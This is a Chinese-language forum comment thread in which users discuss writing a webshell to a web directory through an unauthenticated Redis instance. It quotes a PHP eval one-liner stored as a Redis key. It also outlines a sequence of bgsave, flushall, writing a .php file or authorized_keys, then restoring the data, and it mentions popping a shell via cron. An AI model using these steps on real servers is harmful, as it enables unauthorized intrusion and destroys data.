文件头部不好控制，还有就是在通过redis写shell的时候，有时候数据中有特殊字符，写入的shell如果位于这些数据后面，shell就失效了。最好就是写入的key尽量靠前一些，那个时候就算是有特殊字符，shell还是能用的。

插

我们可以把每个nosql数据库都讨论一下，排排队~~

你忽略了很重要的一点，运行redis的用户要对web目录有可写权限，需要web目录的绝对路径(猜测或者爆绝对路径)，需要组合起来。你测试的文章的例子应该是root跑的redis。

redis拿shell的成本太高，不好批量。

然而，这里存在一个致命的问题，Redis对dump出来的数据设置的是”0600”权限，因此Apache不能读取。（作者是这么写的,元芳你怎么看？）

http://drops.wooyun.org/papers/3062

看来好多人都没有好好看过这篇文章

@我是壮丁
这个我还真考虑了。
一般redis都是root运行的，配置文件里并没有设置用户的项目。如果出现未授权访问的漏洞，那很少权限会降下去。
而且。。。我也没说要……批量呀。抓鸡只是开个玩笑。

@我是壮丁 dump出来是0600，你试过了吗？

@phith0n 写那个的时候当时应该是试过的(当时应该是在地权限下面的)，配置文件里面是没有运行用户这个选项，就看用redis的人的意识了，图方便的就是root。

很早就通过redis搞过了，只是不方便发出来，你懂的

@我是壮丁
嗯，我也就是提个思路，个人也认为比较鸡肋一些，如果导出的文件能控制头，放计划任务里弹个shell什么的也不错。可惜还是有待研究~

redis+phpinfo，路径真是个好东西

这是不是传说的权限问题

@d3pT1
所有命令都在这了：http://redis.io/commands
应该没server命令吧

是不是有什么被编辑掉了...

如果是root跑redis
bgsave - flushall - 写authorized_keys - 再恢复数据

apt-get 安装的redis貌似是默认外网可以访问的  源码安装的不会

redis 居然也能写shell.大牛们的思路真是奇葩.开始学nosql的时候那个导出功能居然这么用....

nice

@phith0n redis-cli连接是不是本地需要安装redis？

@爱上平顶山
是的，不过装redis的时候redis-server和redis-cli会一起都装上了

@爱上平顶山 我好像是没看清问题乱答了一个。。
那个。。亲测只有redis-cli是可以的

@retanoj 没事

@phith0n 这个答复错了，dump出来的数据是运行redis的用户和用户组，权限应该是0644，drops那个是故意写成600的。。。。。

我都是root权限运行的导入的文件是这样的(不可执行)。@phith0n
REDIS0006.hell<?php eval($_POST['cmd'];)?>?n;选.hack@hack:~/tools/sqli/sqlmap$ Xshell

REDIS0006.hell<?php eval($_POST[cmd];)?>?n;选.hack@hack:~/tools/sqli/sqlmap$ Xshell  改成这样了..

@0c0c0f
这是你的一句话？
<?php eval($_POST['cmd'];)?>

@phith0n 都不知道该怎么吐槽这一句话了对吧

127.0.0.1:6379> get she11
"<?php @eval($_POST['cmd']);?>"
改过来了：）

@retanoj
现在浮躁的人太多了。。。一出问题就开始问，也不知道自己多思考一下为什么出问题，唉

@phith0n
除了说的头部特殊字符（我倒是觉得这个分情况），还有就是数据量和路径。作为缓存，dump下来几百M是很正常的，php解析的时候会直接挂掉吧。

再就是得先爆出web server的绝对路径。

@DBA
这个倒是简单呀。先bgsave出来一个备份，再FLUSHALL掉，改rdb文件为.php，导出shell，再改回来。
或者，遇到狠得直接全flush掉，也不管备份不备份了。
技术上应该是没问题的。法律上另说了。

赞，今天碰巧看了下，redis的设计应该是抛弃了安全，在cli能直接修改和生效配置真是醉了！
像这种配置# Since Redis 2.6 by default slaves are read-only.  有什么用？ 只会误导